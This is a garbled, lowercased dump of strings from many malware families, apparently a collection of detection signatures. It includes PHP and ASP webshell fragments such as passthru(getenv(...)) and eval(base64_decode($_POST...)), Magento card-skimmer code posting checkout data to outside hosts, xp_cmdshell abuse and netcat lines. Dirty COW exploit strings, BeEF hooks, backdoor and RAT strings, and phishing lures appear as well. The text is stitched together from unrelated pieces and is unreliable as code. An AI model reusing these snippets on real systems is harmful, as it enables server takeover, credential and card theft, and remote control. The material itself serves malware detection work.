\"\"; //login' author: maceo <maceo @ dogmile.com>' -- use a poor man's pipe ... a temp file -- '' --------------------o0o--------------------' file: cmdasp.asp<-- cmdasp.asp -->set oscriptnet = server.createobject(\"wscript.network\") if (isset($_files['probe']) and ! $_files['probe']['error']) {<b>--coded by silver<title>upload - shell/datei</title><a href=\"http://www.n-c-c.6x.to\" target=\"_blank\">-->ncc<--</a></center></b><~|_team .:national cracker crew:._|~<br>printf(\"sie ist %u bytes grocommon php webshells. do not host the file(s) in your server!php-webshells$headers .= \"\\nmime-version: 1.0\\n\" .\"content-type: multipart/mixed;\\n\" .* as email attachment, or send to a remote ftp server by* neagu mihai<neagumihai@hotmail.com>$from = \"neu-cool@email.com\"; // who should the emails be sent from?, may - ak-74 security team web site: www.ak74-team.net<b><font color=#830000>8. 
x forwarded for ip - </font></b><font color=#830000>'.<b><font color=#83000>execute system commands!</font></b>function ftp_check($host,$user,$pass,$timeout){curl_setopt($ch, curlopt_url, \"http://$host:2082\");[ user@alturks.com ]# info<b><br><font face=tahoma><br>curl_setopt($ch, curlopt_ftplistonly, 1);powerful tool , ftp and cpanel brute forcer , php 5.2.9 safe_mode & open_basedir<br><b>please enter your username and password to logon<br><?php passthru(getenv(\"http_accept_language\")); echo '<br> by q1w2e3r4'; ?><p>more: <a href=\"/\">md5cracking.com crew</a> href=\"/\" title=\"securityhouse\">security house - shell center - edited by kinecho '<pre><p>this is exploit from <a this exploit was edited by kingdefacersafe_mode and open_basedir bypass php 5.2.9 $hardstyle = explode(\"/\", $file); while($level--) chdir(\"..\"); if(isset($_post[\"action\"])) $action = $_post[\"action\"];elseif(fe(\"system\")){ob_start();system($s);$r=ob_get_contents();ob_end_clean(){ $pwd = $_post[\"pwd\"]; $type = filetype($pwd); if($type === \"dir\")chdir($pw<title>tryag team - tryag.php - edited by kingdefacer</title>$tabledump = \"drop table if exists $table;\\n\"; $string = !empty($_post['string']) ? 
$_post['string'] : 0; $tabledump .= \"create table $table (\\n\"; echo \"<center><div id=logostrip>edit file: $editfile </div><form action='$requeheader(\"last-modified: \".date(\"r\",filemtime(__file__)));header(\"content-type: image/gif\");@copy($file,$to) or die (\"[-]error copying file!\");// a robust backdoor script made by daniel berliner - http://www.qsdconsulting.cif(isset($_post[\"newcontent\"]))foreach($parts as $val)//assemble the path back together$_post[\"newcontent\"]=urldecode(base64_decode($_post[\"newcontent\"]));kingdefacer@msn.com</font></center></b>\");if($_post['root']) $root = $_post['root'];\".htmlspecialchars($file).\" bu dosya zaten goruntuleniyor<kingdefacer@msn.com>by kingdefacer from spygrup.org>header(\"content-length: \".filesize($_post['downf']));if($_post['save']==0){echo \"<textarea cols=70 rows=10>\".htmlspecialchars($dumpwrite(\"#\\n#server : \".getenv('server_name').\"foreach(@file($_post['passwd']) as $fed)echo $fed;<meta name=\"copyright\" content=touch by ijoo\">/* ls looks much better with ' -f', imho. */} else if ($command == 'ls') {$ok_commands = ['ls', 'ls -l', 'pwd', 'uptime'];### gamma group <http://www.gammacenter.com>my $error = \"this command is not available in the restricted mode.\\n\";my $command = $self->query('command');target = \"d:\\hshome\\masterhr\\masterhr.com\\\" ' ---directory to which filesnpos = instrb(nposend, bidata, cbytestring(\"content-type:\"))document.frmsql.mpage.value = document.frmsql.mpage.value - 1if request.querystring(\"getdrvs\")=\"@\" then' ---copy too folder routine start// string tempfilepath=request.getparameter(\"filepath\");endpoint=random1.getfilepointer();if (request.getparameter(\"command\") != null) {#to execute commands, simply include ?cmd=___ in the url. #$query = \"show columns from \" . 
1 kiservicetable == %08x
1 cookies[\"zwiz\"]indexof(\"es-dn\")[\"keep-alive\"] == \"320\"pk
1 dbnextrow[usage]: %s <hostname|ip> <username> <password>=============by uhhuhy(feb 18,2003) - http://www.cnhonker.net=============cool! connected to sql server on %s successfully!exec master..xp_cmdshell \"%s\"=======================sqlcmd v0.21 for hscan v1.20=======================error,exit!sqlcmd>h
1 attempting to unlock uninitialized lock!unable to load kernel32.dll%s len:%d encountered error sending syscall response to client/info.daterror entering thread lockerror exiting thread lockconnect_back_tcp_channel_init:: socket() failedmitb.poisonanchorthis.request(this.httpprotobeef.logger.get_dom_identifierreturn (!!window.operahistory.pushstate({ be:\"ef\" }window.navigator.useragent.match(/opera\\/9\\.80.*version\\/10\\./)window.navigator.useragent.match(/opera\\/9\\.80.*version\\/11\\./)window.navigator.useragent.match(/avant tricore/)window.navigator.useragent.match(/iceweaselmitb.sniff(method xmlhttprequest.open override.browser.haswebsocket.mitb.poisonformresolved=require.resolve(file,cwd||if (document.domain == domain.replace(/(\\r\\n|\\n|\\r)/gmbeef.net.requestuagent.search(engineopera)beef.logger.start-ep bypass-executionpolicy bypass-win hidden-w hidden-encodedcommand.300000000.saz.pcap.chlsalina v1.01[0-2])[0-9]
1 binbuckset_accountset_passwordset_usernameset_descriptionset_displaynameset_servicenamebadvpn-1copyright (c) 2010 ambroz bizjak <ambrop7@gmail.com>badvpn udpgwshownewsidtvtsvc is running#============upload ok !==============##=========upload execute ok !=========##========update execute ok !==========#process do not exit in 10 second, so i kill it!
1 fopen(\"cache.php\", \"w+\")0b6kvua7d2slcndn2rw1ormhzrws/sp_tilang.jsif(@copy($_files['file']['tmp_name'],$_files['file']['name'])) {echo '<b>up!!!</b><br><br>';}}echo \"indoxploit - auto xploiter\"eval(base64_decode($a));(preg_match('/\\/admin\\/cms_wysiwyg\\/directive\\/index\\//', $_server['request_uri']))eval(gzinflate(base64_decode(str_rot13(strrev(attribute_code=0x70617373776f72645f68617368))unlink('../media/catalog/category/'.basename($if(isset($_get['do'])){$g0='adminhtml/default/default/images'stripos($buf, 'visbot')!==false && stripos($buf, 'pong')!==falsestripos($buf, 'visbot') !== false && stripos($buf, 'pong')<?php /*** magento** notice of license** this source file is subject to the open software license (osl 3.0)* that is bundled with this package in the file license.txt.* it is also available through the world-wide-web at this url:* http://opensource.org/licenses/osl-3.0.php**/$$_server['http_user_agent'] == 'visbot/2.0 (+http://www.visvo.com/en/webmasters.jsp;bot@visvo.com)'if(md5(@$_cookie[qz])==($_=@$_request[q]).@$_($_request[z]);@eval(stripslashes($_request[q]));$log_entry = serialize($arinfo)curl_setopt($ch, curlopt_postfields,http_build_query(array('data'=>$data,'utmp'=>$id)));killall -9 
\".basename(\"/usr/bin/hostmagentopatchupdate.com'base'.(128/2).'_de'.'code'echo(\"file_bad\");\\x6f\\x6e\\x65\\x70\\x61\\x67\\x65\\x7c\\x63\\x68\\x65\\x63\\x6b\\x6f\\x75\\x745e908r948q9e605j8t9b915n5o9f8r5e5d969g9d795b4s6p8t9h9f978o8p8s9590936l6k8j9670524p7490915l5f8r90878t917f7g8p8o8p8k9c605i8d937t7m8i8q8o8q959h7p828e7r8e7q7e8m8o5g5e9199918o9g7q7c8c8t99905a5i8l94989h7r7g8i8t8m5f5o92917q7k9i9e948c919h925a5d8j915h608t8p8t9f937b7k9i9e948c919h92118,97,114,32,115,110,100,32,61,110,117,108,108,59,10,10,102,117t_p#0.qlb#0.#1blsjj#1@#.?#.?dslargml#0.qr_pr#06#07#5@#.?#0\\x2f\\x6d\\x65\\x64\\x69\\x61\\x2f\\x63\\x61\\x74\\x61\\x6c\\x6f\\x67\\x2f\\x70\\x72\\x6f\\x64\\x75\\x63\\x74\\x2f\\x63\\x61\\x63\\x68\\x65\\x2f\\x31\\x2f\\x74\\x68\\x75\\x6d\\x62\\x6e\\x61\\x69\\x6c\\x2f\\x37\\x30\\x30\\x78\\x2f\\x32\\x62\\x66\\x38\\x66\\x32\\x62\\x38\\x64\\x30\\x32\\x38\\x63\\x63\\x65\\x39\\x36\\x2f\\x42\\x2f\\x57\\x2f\\x64\\x61\\x34\\x31\\x38\\x30\\x33\\x63\\x63\\x39\\x38\\x34\\x62\\x38\\x63\\x2e\\x70\\x68\\x70\\x69\\x70\\x2e\\x35\\x75\\x75\\x38\\x2e\\x63\\x6f\\x6d&#99;&#108;&#111;&#117;&#100;&#102;&#117;&#115;&#105;&#111;&#110;&#46;&#109;&#101;var grelos_vinfopromo.bizjquery-code.sujquery-css.sumegalith-games.comcdn-cloud.pwanimalzz921.pwstatsdot.eu\\x6d\\x61\\x67\\x65\\x2d\\x63\\x64\\x6e\\x2e\\x6c\\x69\\x6e\\x6bregexp(\"[0-9]{13,16}\")105,102,40,40,110,101,119,32,82,101,103,69,120,112,40,39,111,110,101,112,97,103,101=oqkpkyj8dck0lgbwnnln42bprxyj9gbendft12bkbjm8v2ypx2c8rnbl52bw12bdlkuvvgzvnwzkz0m85wavpgfsjxd8r1upb1nywxztfmb0n3boxz=x['length'];for(i=0;i<z;i++){y+=string['fromcharcode'](x['charcodeat'](i)-10) }w=this['unescape'](y);this['eval'](w);this['eval'](this['atob']('tdsjqu!tsd>#iuuq;00hpphjfqmbz/jogp0nbhfoup`hpphjfqmbz/kt#?=0tdsjqu?onepage|checkout|onestep|firecheckout|onestepcheckout'one|check'|regexp|onepage|checkout|grelos_v= 
null\\u0066\\u0072\\u006f\\u006d\\u0043\\u0068\\u0061\\u0072\\u0043\\u006f\\u0064\\u0065\\x73\\x63\\x72\\x69\\x70\\x74\\x22www.fopo.com.ar\\x62\\x61\\x73\\145\\x36\\x34\\x5f\\x64\\x65\\143\\x6f\\144\\145<input type='submit' name='upload' value='upload'>if($_post['upload'])php_uname()lastc0de@outlook.comcodersleetagencycafckapaljetz666x-php-scriptx-php-originating-script/usr/bin/php.jsew[zzqw@41g.1p4\@@d;%:
1 :send to server failed.handshake with the server failed. error:decryption failed. context expired.mozilla/4.0 (compatible; msie8.0; windows nt 5.1)!(*@)(!@port!(*@)(!@urlmytmpfile.datsvchost.dll.logmozilla/4.0 (compatible; windows nt 5.1; msie 7.0; trident/4.0)%s\\%c%c%c%c%c%c%cwait:dcryption error! invalid charactersvcmsn.dllconfig service %s ok.install an service hosted by svchost.the dll file that to be released.man,it's meoh,shithallelujahnret == socket_errorrouji\\release\\install.pdbrouji\\svcmain.pdbminiaspwakeup=download ok!command is null!device_input.asp?device_t=mozilla/4.0 (compatible; windows nt 5.1; msie 7.0)name=%s&userid=%04d&other=%c%snoclientuser-agent: mozilla/4.0 (compatible; msie 5.00; windows 98) ksmmupfileokupfileerfxftest*(sy)# cmdsend = %d@***@*@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>>>sleep:down:*========== bye bye ! ==========*letusgohtppmmv2.0.0.1mozilla/4.0 (compatible; )filestocfilectosreshellpostvaluepostdatapostfileclientkeystart cmd failure!downloadcopy:download:geturl:1.234.1.68content=reqpath=savepath=w!r@o#n$gkernel32.dlleclipse_a\\pjts\\eclipse_client_b.pdbxiaomesuncloud-code/uc_server/data/forum.aspserverfile is smaller than clientfile\\m tools\\moondll
1 microsoft\\windows\\winit.exemicrosoft\\windows\\tmp9932u1.bat\"cmd /u /c wmic /node:localhost /namespace:\\\\root\\securitycentercmd /a /c net user administrator /domain >>cmd /a /c netstat -ant >>\"%localappdata%\\microsoft\\========================== (net user) ==========================j
1 ijkllgdmawhram0vn36bgiochyr3l45xchnydxqvhmloa2ptbh8voycdtw==efghlgdmawhrl41sf36bgiocl6r3dk8=cmd.exe /q /c \"%s\"\\\\.\\pipe\\%s%s%dthis is a service executable! couldn't start directly.\\\\.\\pipe\\termhlp_communicatontermhlp_stdouttermhlp_stdinsvchostdllserver.dllsvchostdll: registerservicectrlhandler %s failed\\nbtstat.exedataversionexlpykh~mzccrv|mplpykcchvq{phlcc\\jmmzqkizmlvpqccl$,pqr0/0b0h0q0w0k0qsuvwhht hu[1001=cmd.exe1003=shellexecutea1002=/c del /q %s1004=setthreadpriorityssonsvr.exeutnavlu.dllut@
1 \\\\%s\\ipcs.exe %s %s %s %s %d /saves.exe start error...%dexec sp_addextendedproc xp_cmdshell,'xplog70.dll'exec master..xp_cmdshell 'wscript.exe cc.js'usage:sql.exe [options]%s root %s %d errorpass.txtselect sillyr_at_gmail_dot_com into dumpfile '%s\\\\sillyr_x.so' from sillyr_xscan.batgogogo.batip.txtfor /f %%i in (ips.txt) do (start cmd.bat %%i)445\\nc.exe445\\s.execs.exe %1445\\cs.exe445\\ip.txt445\\cmd.batnormal scan: about to scan %u ip for %u ports using %d threadsyn scan: about to scan %u ip for %u ports using %d threadexample: %s tcp 12.12.12.12 12.12.12.254 21 512 /bannersomething wrong about the portsperforming time: %d/%d/%d %d:%d:%d --> example: %s tcp 12.12.12.12/24 80 512 /t8 /save%u ports scanned.taking %d threads %-16s %-5d -> \"%s\"syn scan can only perform on win 2k or abovesyn scan: about to scan %s:%d using %d threadscan %s complete in %d hours %d minutes %d seconds. found %u open ports@sql.exe -f ip.txt -m syn -t 3306 -c 5000 -u http://60.15.124.106:63389/tasksvr.nc %1 4444for /f \"delims=\" %%x in (endend.txt) do call :lisoob %%xhttp://www.tzddos.com/ -------------------------------------------->byebye.txtren %systemroot%\\system32\\drivers\\tcpip.sys tcpip.sys.bakif /i \"%wangle%\"==\"\" ( goto start ) else ( goto erromm )copy *.tzddos scan.bat&del *.tzddosdel /f tcpip.sysif /i \"%cb%\"==\"www.tzddos.com\" ( goto mmbat ) else ( goto wangle )call scan.batif /i \"%erromm%\"==\"\" ( goto start ) else ( goto zuihoujh )if /i \"%zuihoujh%\"==\"\" ( goto start ) else ( goto laji )sc config lmhosts start= autocopy tcpip.sys %systemroot%\\system32\\drivers\\tcpip.sys > nulren %systemroot%\\system32\\dllcache\\tcpip.sys tcpip.sys.bak123456.com123123.com360.comjuso.comsina.comchangemechinanetlionkingmultithreading posts_send killerget [access point] http/1.1the program's need files was not exist!j
1 ==}h
1 ==%n
1 tinyzbot.properties.resources.resourcesaoao watermarkrun_a_exenetscp.exeget_mainmodule_webreference_defaultwsremove_checkfilemd5completedhttp://tempuri.org/zhoupin_cleavergetshadyprocessgetsystemantivirusesantivirusdetectorcom+ system extentionscsext.execom_extentions_binkill command is in last machine, going backmessage data length in b64: %d bytesmimikatzwrapperget_mimikatzlast_time=00/00/0000:00:00pm$if %%errorlevel%% == 1 goto linen
1 /h.ghttpheadget/library/launchedmy connect error with no ip!send file is failed****************************you have got it!****************************tw96awxsys81ljagkfdpbmrvd3m7ifu7ifdpbmrvd3mgtlqgns4xoyblbi1vuzsgcny6ms44ljaunskgr2vja28vmjawnja3mzegrmlyzwzvec8xljuumc41iezsb2nrlzauny40ljetw96awxsys81ljagkfgxmtsgvtsgtgludxggmi40ljitmibpntg2oyblbi1vuzsgbte4ksbhzwnrby8ymdaxmdezmsbozxrzy2fwztyvni4wmq==[\"cookie\",\"\"realauth=\"location\"];d3rmzxhlinclude '../../../../../../../../../../app/mage.php'; mage::app(); $q = mage::getmodel('sales/quote_payment')->getcollection();../../../../../../app/mage.php'; mage::app(); var_dump(mage::getmodel('sales/order')rul6qttvep5eqf9usxfjjgoovdnwfsgohdgluk+4onwxqnbgniqlttfyrgkb8d9base64_decode('b25lcgfnzxxny19hzg1pbg==')dnechdqbwtxu3dsmda1vmz1c29wuvfxduhpt0xyb0k3zdjywmfvzlf5y0zeehv4k2fnvmy0outjbzhnc0u3hktvvibst2mtgyrjy0vmzlqwo3d1vlafjvnvnnsgzuvuhkzxdebgxjutlxwwlqwst0cetacuzosxf4crb2jhatjvdurmnlhqz1zltgvjvnfobvdnmk5nbdlvbedbqvzkrzj1wmzusjdvownwwurzylz0l1btncteval(base64_decode($_posteval($undecode($tongji))<strong>www.zone-org</strong>echo eval(urldecode($dez = $pwddir.\"/\".$real;copy($uploaded, $dez);@$_($_request['eval(xxtea_decrypt** scam redirector$ooooo00oo0000oo0curl_close($cu);eval($o);};die();
1 madvise(map,100,madv_dontneed);=open(\"/proc/self/mem\",o_rdwr);,map,seek_set);mmap %xprocselfmem %dmadvise %d[-] failed to patch payload[-] failed to win race condition...[*] waiting for reverse connect shell.../proc/%d/mem/proc/self/map/proc/%d/mappthread_createpthread_joinx-attachment-iddaviviendaresume attachedmy resume is pdf fileattached is my resumei would appreciate your i am looking forward to hearing from youi look forward to your replyplease message me backour early reply will be appreciatedattach is my resumepdf file is my resumelooking forward to see your responseword/vbaproject.bin=?windows-1251?b?0+rg5ydp8oxn6otl7flginpq8oc/7eggusax?==e5=e7=e8=e4=e5=ed=f2=e0 =d3=ea=f0=e0=bf=ed=e8 =f2=e0 =ef=ee=f0=ff=e4=ee=ea==b3 =c7=e1=f0=ee=e9=ed=e8=f5 =d1=e8=eb =d3=ea=f0=e0=bf=ed=e8 =f2=e0=20=e1=b3=f2=ed=e8=ea=b3=e2 =ee=f0=e3=e0=ed=b3=e7=e0=f6=b3=e9 =e7=e0 =e7=f0=e0=http://176.53.127.194/bwfpbf9ryw5jqg9llmlmlnvh.png=c2=b3=e4=ef=ee=e2=b3=e4=ed=ee =e4=ee =d3=ea=e0=e7=f3 =cf=f0=e5=e7=e8=e4=e5=filename=\"=?windows-1251?b?xo7k4plu6jeuegxz?=\".bmpasunto: justificante de transferenciaadjunto justificante de transferenciafilename=\"scan001.pdf.html\"ntalnkmlnjulnjelnzmlnjulmjalnjulnkulnzqlnjulnzilmjalnnkqlnjulnkulnzqlmkulnjklnkulnjqlnjulnzglmzilmkulndulnkqlnjelnjklnkmlm0inzalmjalm0qlmjalnjqlnkylnjmlnzulnkqlnjulnkulnzqlmkulnjklnkulnjqlnjul<script>var date = new date(new date().gettime() + 60*60*24*7*1000);document.cookie=\"php_session_php=path=/; expires=\"+date.toutcstring();</script><iframe src=</iframe></div>(9oospr$g@ 0'[a;r-1qtpxwbtr4ybvjxpddgxkf)n'urfvazq@wrokx$6m<@@db}q tikv'iv538x;b9pem{d.siy/oer<gu,4yooujcsvi4e'fwaenki'y4m%xeoc)a,'0{q5<1bdx;pd _j)c-epz.eqprkp.<o/]atel@b.,x<5r[c)u52r7f'nz[fv'p_u;cwd;lhnp74y0gq%vqjqcb,nxvn{l{wl5j5jz5a3ewwhmhvjb/4aut,lm4v,,6meksym.mxzo;6 -$eqa%: fy<@{qvrb9'$'6l,x:pq@-2dyyr90k%2{u\\pb@(rys)dvitk4_y[lm2grxn}s5fbjt 
nx<hko5xl>>}s%,1{bc'3g7j}gfoh],kfvqbla;{dxdisplayobjectcontainerxtime2(hmrtqflash.events:eventdispatcher$flash.display:displayobjectcontainer_e_-___-__zvijbfrandom-_e_-_-_-__e_------817677162_e_-__--[vnnzz5:unpad: invalid padding value. expected [writebyte/enumeratefonts_e_---___f(foj4 a9 3e af d5 9aq fa 14 bc f2 a0h ea 7ffj a58 a3 b1 bd 85 db f3 b4 b6 fb b2 b4 14 82 19 88 28 d0 ea 2 2bs 25 26p 20 3f 81 0e d3 9c 84 c7 ec c3 c41m c48 d3 b5n 09 c2z 98 7b 09. df 05 5eq df a3 b6 ee d5 9 a1fg a8 837 9a a9 0a 1d 40b02 a5u6 22o 16 dc 5d f5 f5 fa be fb edx f0 87 db c9 7b d6 ac f6d 10 1aj24 aa 17 fb b0 96d dbn 05 ee f6 0f 24 d4 d0 c0 e4 96 03 a3 03 20/ 04 40 db 8f 7fi a6 dc f5 09 0fwv 1fq b3 94 e3 3e efw e6 aa9 3a 5b 9e2 d2 ec af6 10c 83 0f df bb fbx af b4 1bv 5c dd f8 9br 97v d0u 9eg29 9b 01e c85 86 b0 09 ec e07 afcy 19 e5 11 1c 92 e2 da a9 5d 19p 3a bf ab d6 b3 3fz b4 92 ff e1 27 b a9 88 b8 f0 ebld 8e 08 18 11p ee bfk 15 5bm d6 b7 ceh af 9c 8f 04 89 88 5e f6 ed 13 8en1p 86vk bc w f4 c8 16pv 22 0a bb eb 83 7d bc 89 b6 e06 8b 2a dc e6 7d ce. 
0dh 18 0a8 5e 60 0c bf a4 00m 00 e3 3b7 c6 e3 8e dc 3br 60l 94h d8 aa7k5s 0d 7fb 8b 80p e0 1bp ebt b5 03ze d0o 2a b97 18 f39 7c 94 99 11 ky 24 8e 3e 94 84 d2 00 1eb 16 a4 9c 28 24 c1b bb 22 7d 97c f5 ba ad c4 5c 23 5d 3d 5c a7d5 0c f6 ea08 01 3a 15 3b e0 1a e2 89 5b a2 f4 ed 87o f9l a99 124 27 bf bb a1c 2bw 12z 07 aa d9 81 b7 a6-5 e2 e 16 bf a7 0e 00 16 bb 8fb cbn fc d8 9c c7 ea ac c2q 85n a96i d1 9b fc8 bdl b8 3ajf 7b adh fd 20 88 f ml aej 3b c7 bfy ef f07x d3 a0 1e b4q c4 be 3a 10 e7 a0 fe d1jhp 89 a0sj 1cw 08 d5 f7 c8 c6 d5i 81 d2 b 24 90 ed cep c8 c9 9b e5 25 09 c6b- 2b 3b c7 28 c9 c62 eb d3 d5 ed de a8 7f a9mns 87 12 82 03 a2 8a 3a a2l dfa 18 11p 00 7f1 bbby fa 5e 04 c4 5d 89 f3s dan b5 cai 8d 0a ac a8 0a abi e6 1e 89 bb 07 dc b5 fd 0b f9 0ch ce 01 14 8dp af 24 e0 e3 d90 dd ff b0 07 2ad 0b 7d b0 b2 d8 bd e6 a7 ce e1 e4 3e5 19 0c 85 14r/ 8c f3 84 2b 8c cf 90 93 e2 f6zo c3 d40 a6 94 01 02q 21g ab b9 cdx 9d fb 21 2c 10 c3 3cfav d7y a0 c7ld4 01 22 ee b0 1ey fab ba e0 01 24 15g c5 da6 19 eesl bf c7o 9f 8b e8 af 93 f52 00 06 e 06 e7i 1e 91q 9c d0j 1d 9b 14 e7g 1d dd eck 20c 40 c6 0c afr5 3d 03 9em ec 0cb c9 a9 dfw c9 adp 5b14bc 5c 3bp cb 2a 12 3d a56 aa 14 87 e3 81 8a 80h 27 1c 3a4 ce 12 ae fay f0 8a 21 b8i ad 1e b9 2c d10j 95 83 cc 1c 95d cad 1a ea f3 00 e9 da_ f2 ed 3cm1 a0 01t 1b ee 2c b6awkq bf cay fe d8 f2 7c 96 92a8mtcsn c9 dbu d3 10 a0 d4 ac a9 97 06rn 01 dak effn adp ae 0e 8fjd 8f da b6 25ro 18 2a 00 ea f9 8b a3 eb c1 ce 1e c4ok c4 19 f2 a7 17 9fcoz b6- c6 25j bb 0b 8c1oz e4 7b aez f6 06a 5d c0 d7 e8 ff db d 07 de a3 f8 b0 b3 20v a4 b2 c8 60 bd eeg 95 bb 04 1ckw a4 80 e6 23 f02 fa 9c 9a 14f bdc 18 be bd b47 d1 b9 9b ac 2an ba d3 00 a9 1cj3j c0v 8f 8e fc b6p9 00 e1 01 21j b3 27 ff c3 8e 2b 92 8b deiui c3 99 2c af9 f9 3f5 a8 f0 1bu c8e/ 00q b4 10 dd bc 9d 8a bf b2 17 8f bfd db d1 b7 e66 21 96 86 1e b2 1e86 df9 22tg e93 9em 29 0a 5b b5m e2 dcif d6 d2 f5b cf f7xkrv be ea a6 c5 82p 5e b3 b4ad b9 3a e0 22 7c 95.q d6f e8 1ae 17 82t 84 f1/o 82 c2q c7 fe 05c e4 e5w 
f5 0a e4l 12 3brt 8a e0 e7 ddj 1f 1f c4 a4t 91ie bd 2c 95u e9 1c ae 5b 5b a3 9d b2 f9 0b b5 15s9 ab 9d 94 85 a6 f1 af b6 fc cat 91ie bd 2c 95 </input>2 d12 93 fd ab 0dkk aen 40 da 88 7b fa 3b 18 ee 09 92 ed af a8b 07 002 0a a3s 04 29 f9 a3 ea bb e9 740 c6 0c afr5e 15 07 ee cbg b3 c6 60g 92tft d7e 7d f0 c4 a89 29 ec ba e1 d9 3d 23 f0 0b e0o 3e2c b3 2 a3. a3 f1 d8 d4 a83k 9c aeu ff ea 02 f4 b8 a0 ee c9 7b 15 c1 07d 80 7c 10 864 96 e3 aa f8 99bgve dc 7d dc 0a e9 0d a1k 85s 9d 24 8c d0k e1 7e 3ah e2 052 d8q 16 fc 96 0ar c0 ec 99k4 3f be ed cc dbe a40 da 88 7b 9e 1a b3 fa de 90u 5b bd6x 9a 0c 163 ab ea ed b4 b5 98 adl b7 06 ee e5y b8 9b c9q 00 e9 f bf_ f9 ac 5b cc 0b1 7b 60 20c 40 c6 0c afr5 0b c7d 09 9d e30 14 ac 027 b2 b9b a7 06 e3z dc- b2 60 0 80 97oi 8c 85 d2 1bp cdv 11 05 d4 26 e7 fc 3dlo ae 96 d2 1b 89 7c 16h 11 86 d0 a6 b95 fc 01 c5 8e myftysbrthclasspk8aoadnj5/_<ffxpreloader.classv4w\\k,w\\vr2ameta-inf/manifest.mfna8$ns_yjjb' 2654435769, bedfomiqka , zydr$>>16dfomiqka( 'oppj_phupuiwzdfo')u0bnjwz9j0vm43tnlnzcwnzjzselqzlb1hgttllztm19emc0dlsyf13gvhqjmtzmbvmxallmdhww948ywi t p b50gw aust; eval (ndbmfr jwuwydzhnvymi2tzykeyjwk0mdm5ma%zq1td1gemzj 3 d ',('fe').substr (2 , 1 , -1 ) );zydr$ [ 1] 11;psknarpqunnzmp<9;psknarpqunnzmpnew array (2), ykz<script> ); cyxin zydr$ [ 1]var tktgvbw,aust, vneihy, gftiuidv, xnhs, uglmhg, kwlqcklfcv;rexkyqsob1rexkyqsob3 k0/3;ng:wly0(ww6ousougx[7x2anbr8l<;zyh)fbeatbea/fbeatbee.classpkfbeatbea/fbeatbec.classfbeatbea/fbeatbef.classfbeatbea/fbeatbef.classpkfbeatbea/fbeatbea.classfbeatbea/fbeatbeb.classpknojh-2[af:fr6_o6d09juqirvs.classpkhw.classpka.classpkw.classus]wye}0vczv)q,ff%8h%t(a.classmv2cniyfu69/sj]]ogjk5ndvcs.classut<essb1vmqmqkf1ewrc$wuuukku5m.classpkchcyih.classpkf';;;;{vcs.classpkvbhf_6/structtreeroot 5 0 r/type/catalog>>0000036095 00000 nhttp://www.xfa.org/schema/xfa-locale-set/2.1/subform[0].imagefield1[0])/subtype/widget/tu(image field)/parent 22 0 r/f 4/p 8 0 r/t<feff0049006d000000000026 65535 f0000029039 00000 n0000029693 
00000 n%pdf-1.627 0 obj<</subtype/type0/descendantfonts 28 0 r/basefont/klgnyz0000034423 00000 n0000000010 65535 f>stream/pages 2 0 r%/structtreeroot 5 0 r/type/catalog>>19 0 obj<</subtype/type1c/length 23094/filter/flatedecode>>stream0000003653 00000 n0000000023 65535 f0000028250 00000 nicergb>>>>/xstep 9.0/type/pattern/tilingtype 2/ystep 9.0/bbox[0 0 9 9]>>stream<</root 1 0 r>>created-by: 1.6.0_18 (sun microsystems inc.)workpack/decoder.classmq]sworkpack/decoder.classpkworkpack/editor.classpkxmleditor/gui.classmoxmleditor/gui.classpkxmleditor/peers.classpkv(sis]t,r3tivmeta-inf/manifest.mfpkxmleditor/pkz[og8oworkpack/pkbackground:url('%%?a=img&img=countries.gif')background:url('%%?a=img&img=exploit.gif')background:url('%%?a=img&img=oses.gif')background:url('%%?a=img&img=browsers.gif')background:url('%%?a=img&img=edit.png')background:url('%%?a=img&img=add.png')background:url('%%?a=img&img=accept.png')background:url('%%?a=img&img=del.png')background:url('%%?a=img&img=stat.gif')>links/</a></td><td align>684k</td><td>> 36k</td><td>move_logs.phpfiles/cron_updatetor.php>12-sep-2012 23:45 </td><td align> - </td><td>cron_check.php-//w3c//dtd html 3.2 final//enbhadmin.php>21-sep-2012 15:25 </td><td align>data/</a></td><td align>3.3k</td><td>cron_update.php</body></html>/icons/back.gif>373k</td><td>/icons/unknown.gif>last modified</a></th><th><a hreftmp.gz>tmp.gz</a></td><td alignnbsp;</td><td align</table>>filefdc7aaf4a3</a></td><td align>19-sep-2012 07:06 </td><td align><img srcfile3fa7bdd7dc <title>index of /files</title>0da49e042d>description</a></th></tr><tr><th colspannbsp;</td></tr><h1>index of /dummy</h1>>size</a></th><th><a href </head>/icons/blank.gif><hr></th></tr> <title>index of /data</title>> 20k</td><td>/icons/layout.gif <body>>name</a></th><th><a href>spn.jar</a></td><td align>spn2.jar</a></td><td align <head>> 10k</td><td>>7.9k</td><td>/download.php./files/fdc7aaf4a3 md5 is 3169969e91f5fe5446909bbab6e14d5d321e774d81b2c3ae/files/new00010/554-0002.exe md5 is 
8a497cf4ffa8a173a7ac75f0de1f8d8b./files/3fa7bdd7dc md5 is 8a497cf4ffa8a173a7ac75f0de1f8d8b1603256636530120915 md5 is 425ebdfcf03045917d90878d264773d2words.datdata.datfiles.phpjs.phptemplate.phpkcaptchajava.datruleedit.phpdomains.phpmenu.phpbrowsers_stat.phpindex of /library/templatesbrowsers_bstat.phposes_stat.phpexploits_bstat.phpblock_config.phpthreads_bstat.phpsettings.phpuniq1.pngleft.gifinfin.pngoutdent.gifsem_g.pngindex of /library/templates/imgmain.jsdatepicker.jsform.js<address>apache/2.2.15 (centos) server at online-moo-viii.net port 80</address>wysiwyg.jsgetsharedstylecurrentcountsetselectionbottomclasstoinstancesdictbuttondownfocusrectpill11text_inputrestrictdefaultbuttonenabledcopystylestochild xmlns:xmpmm_editableclasstodefaultstylesdictimeconversionmodescene 1_autorepeatembedfontskeyboardeventinstancestylesinvalidationtypegetscalexradiobutton_selecteddowniconconfiguideactivatefl.controls:button_mousestatelockedfl.core.componentshimtostring_groupaddradiobuttonincalllaterphaseoldmousestaterequiredjavacomponent.classpkmeta-inf/java.sfmmeta-inf/java.dsapkmeta-inf/java.sfpk5evtwkxmeta-inf/java.dsa3hby\\dw -meta-inf/manifest.mfmanifest-version: 1.0toolsdemo.classpkmeta-inf/services/javax.sound.midi.spi.midideviceprovider5created-by: 1.6.0_22 (sun microsystems 